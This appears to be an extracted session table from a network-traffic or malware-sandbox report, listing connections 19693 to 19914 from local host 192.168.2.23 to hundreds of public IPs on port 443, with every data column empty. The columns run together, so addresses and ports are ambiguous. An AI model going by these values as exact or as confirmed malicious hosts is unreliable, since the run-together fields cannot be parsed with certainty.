                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19693192.168.2.2345634203.98.138.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19694192.168.2.235263086.44.26.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19695192.168.2.233813671.6.195.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19696192.168.2.233935643.110.148.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19697192.168.2.2354752140.90.48.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19698192.168.2.2344664196.191.16.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19699192.168.2.2358080128.170.101.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19700192.168.2.233967083.119.9.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19701192.168.2.2334430199.108.51.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19702192.168.2.235609297.146.219.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19703192.168.2.233415094.140.229.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19704192.168.2.234449045.22.114.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19705192.168.2.233403087.129.238.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19706192.168.2.2351366187.160.230.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19707192.168.2.2339856194.187.231.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19708192.168.2.235946475.187.234.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19709192.168.2.2348186108.16.9.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19710192.168.2.2359278216.47.64.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19711192.168.2.2356380125.127.142.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19712192.168.2.2338656140.19.195.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19713192.168.2.2352234203.43.133.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19714192.168.2.236019481.115.65.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19715192.168.2.2341600187.117.227.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19716192.168.2.2335036139.206.84.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19717192.168.2.235544297.16.177.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19718192.168.2.234902243.203.30.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19719192.168.2.233996837.5.120.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19720192.168.2.2337850121.229.182.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19721192.168.2.235773419.222.129.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19722192.168.2.234475681.29.27.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19723192.168.2.2357574157.78.41.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19724192.168.2.2339958149.254.51.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19725192.168.2.233420869.236.102.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19726192.168.2.2350670167.236.237.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19727192.168.2.2352924156.120.54.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19728192.168.2.2360624155.217.252.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19729192.168.2.235166046.239.139.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19730192.168.2.2349592211.143.198.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19731192.168.2.2339796187.251.14.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19732192.168.2.2336944159.60.244.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19733192.168.2.234914676.107.189.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19734192.168.2.2352024154.206.151.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19735192.168.2.234995474.96.251.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19736192.168.2.2340008174.104.128.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19737192.168.2.234151493.156.157.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19738192.168.2.2358390164.210.178.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19739192.168.2.2349118139.68.60.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19740192.168.2.233766044.32.184.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19741192.168.2.2351400101.147.35.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19742192.168.2.2347650135.8.1.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19743192.168.2.2335796125.160.14.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19744192.168.2.2338980107.177.165.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19745192.168.2.2341188200.221.238.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19746192.168.2.2342470202.81.28.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19747192.168.2.2359538113.248.149.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19748192.168.2.235774445.30.201.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19749192.168.2.233480048.111.74.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19750192.168.2.233543223.35.249.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19751192.168.2.2334328178.64.184.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19752192.168.2.23450708.164.148.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19753192.168.2.2336040195.39.85.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19754192.168.2.2338080195.141.88.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19755192.168.2.2337640210.162.214.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19756192.168.2.2359070133.235.229.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19757192.168.2.233439014.198.116.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19758192.168.2.233813246.174.221.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19759192.168.2.234346466.56.13.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19760192.168.2.2355284169.18.92.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19761192.168.2.2340160172.202.154.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19762192.168.2.235538264.187.235.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19763192.168.2.2344334211.12.248.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19764192.168.2.235179813.151.47.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19765192.168.2.235024843.51.140.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19766192.168.2.2346276194.231.216.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19767192.168.2.2336104106.89.165.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19768192.168.2.2338956110.242.112.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19769192.168.2.234489498.246.112.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19770192.168.2.2341946203.84.75.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19771192.168.2.235238099.117.25.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19772192.168.2.2341660120.214.78.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19773192.168.2.2335038114.188.10.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19774192.168.2.235438850.71.212.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19775192.168.2.2354582137.17.167.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19776192.168.2.234490643.222.189.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19777192.168.2.233878018.92.242.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19778192.168.2.2340296182.124.1.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19779192.168.2.233949614.212.242.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19780192.168.2.235762087.25.126.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19781192.168.2.2359924113.53.91.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19782192.168.2.2354118119.203.101.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19783192.168.2.234966014.44.226.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19784192.168.2.234070813.75.119.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19785192.168.2.2352576170.163.236.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19786192.168.2.234599036.144.66.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19787192.168.2.2343508122.69.114.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19788192.168.2.2353122149.147.8.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19789192.168.2.2349074189.134.239.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19790192.168.2.2346572161.41.164.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19791192.168.2.2335190196.139.223.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19792192.168.2.2352422212.181.226.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19793192.168.2.2334704100.58.70.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19794192.168.2.233786896.108.164.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19795192.168.2.2347280161.111.166.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19796192.168.2.233798642.209.198.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19797192.168.2.234272270.142.214.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19798192.168.2.2359748189.255.251.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19799192.168.2.234547013.1.254.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19800192.168.2.2337236182.215.59.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19801192.168.2.2335488219.218.22.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19802192.168.2.2333044173.65.14.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19803192.168.2.235057812.167.175.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19804192.168.2.235241419.28.7.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19805192.168.2.2340560185.108.140.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19806192.168.2.2356340109.81.70.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19807192.168.2.235080483.120.126.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19808192.168.2.2348996182.232.194.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19809192.168.2.2346692165.177.54.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19810192.168.2.235899845.35.108.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19811192.168.2.2356144204.213.146.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19812192.168.2.235468872.207.78.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19813192.168.2.2332956166.185.202.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19814192.168.2.2341774125.11.236.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19815192.168.2.2339530171.149.25.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19816192.168.2.2342700156.237.70.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19817192.168.2.235403450.63.0.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19818192.168.2.234211031.222.14.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19819192.168.2.2357138158.49.147.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19820192.168.2.23488108.15.191.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19821192.168.2.233498868.253.171.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19822192.168.2.235056885.201.144.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19823192.168.2.233786843.131.70.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19824192.168.2.235163817.221.174.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19825192.168.2.2341396212.175.137.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19826192.168.2.2344432162.185.190.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19827192.168.2.2346498187.140.98.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19828192.168.2.234144677.194.75.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19829192.168.2.2344458200.246.14.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19830192.168.2.2336806103.126.0.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19831192.168.2.235223079.4.77.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19832192.168.2.234788857.243.240.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19833192.168.2.235570219.186.173.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19834192.168.2.233850012.171.143.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19835192.168.2.234280012.103.14.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19836192.168.2.23422149.239.70.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19837192.168.2.2358938151.209.122.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19838192.168.2.2336272190.77.224.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19839192.168.2.2333456207.206.50.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19840192.168.2.2345198141.126.139.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19841192.168.2.2351254187.82.224.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19842192.168.2.2347656174.204.177.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19843192.168.2.2333390206.183.187.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19844192.168.2.235551612.82.53.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19845192.168.2.2354974105.239.114.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19846192.168.2.2358434115.253.217.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19847192.168.2.2348200186.33.93.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19848192.168.2.2345352180.32.184.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19849192.168.2.233485220.186.24.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19850192.168.2.2355896101.89.163.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19851192.168.2.2346272144.165.127.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19852192.168.2.2344252192.22.4.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19853192.168.2.2340240201.254.247.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19854192.168.2.2346054126.12.88.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19855192.168.2.234563212.34.207.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19856192.168.2.233916287.247.17.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19857192.168.2.23556344.113.99.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19858192.168.2.2353056139.75.176.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19859192.168.2.2334056112.5.208.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19860192.168.2.2351500142.22.170.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19861192.168.2.2340178189.75.75.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19862192.168.2.2333910148.50.52.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19863192.168.2.2336164124.191.20.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19864192.168.2.2346454182.244.174.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19865192.168.2.235780619.152.80.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19866192.168.2.2352670131.22.131.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19867192.168.2.235632065.122.37.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19868192.168.2.234890857.5.47.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19869192.168.2.2359028205.110.103.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19870192.168.2.233377658.47.68.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19871192.168.2.233747693.67.194.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19872192.168.2.2344624106.95.48.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19873192.168.2.233437265.1.239.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19874192.168.2.2356152177.167.1.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19875192.168.2.23457028.165.245.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19876192.168.2.234948884.241.23.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19877192.168.2.235158257.145.137.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19878192.168.2.2340996195.184.154.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19879192.168.2.235637869.245.115.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19880192.168.2.234436697.192.172.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19881192.168.2.2344010116.116.193.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19882192.168.2.235848661.47.99.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19883192.168.2.233376248.165.169.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19884192.168.2.2345380203.104.134.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19885192.168.2.2345936154.65.245.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19886192.168.2.2340694201.140.90.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19887192.168.2.2342546151.95.12.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19888192.168.2.2352106146.40.77.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19889192.168.2.2358704218.239.254.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19890192.168.2.2355758142.96.106.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19891192.168.2.2352582102.96.216.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19892192.168.2.234698669.45.120.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19893192.168.2.2344924183.198.99.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19894192.168.2.233575893.167.42.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19895192.168.2.234938671.253.102.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19896192.168.2.234049469.84.240.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19897192.168.2.234515076.148.249.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19898192.168.2.2347292207.239.63.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19899192.168.2.234706274.35.173.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19900192.168.2.2353516186.231.131.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19901192.168.2.234227212.46.230.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19902192.168.2.2354718164.129.115.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19903192.168.2.233638245.247.166.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19904192.168.2.234240218.119.216.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19905192.168.2.2355868137.10.229.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19906192.168.2.2334754158.221.233.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19907192.168.2.23589224.168.139.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19908192.168.2.233510086.254.143.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19909192.168.2.2358444103.96.8.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19910192.168.2.233387417.188.219.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19911192.168.2.235030696.167.33.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19912192.168.2.2339690128.253.78.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19913192.168.2.234964299.153.209.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19914192.168.2.23493824.239.108.224443
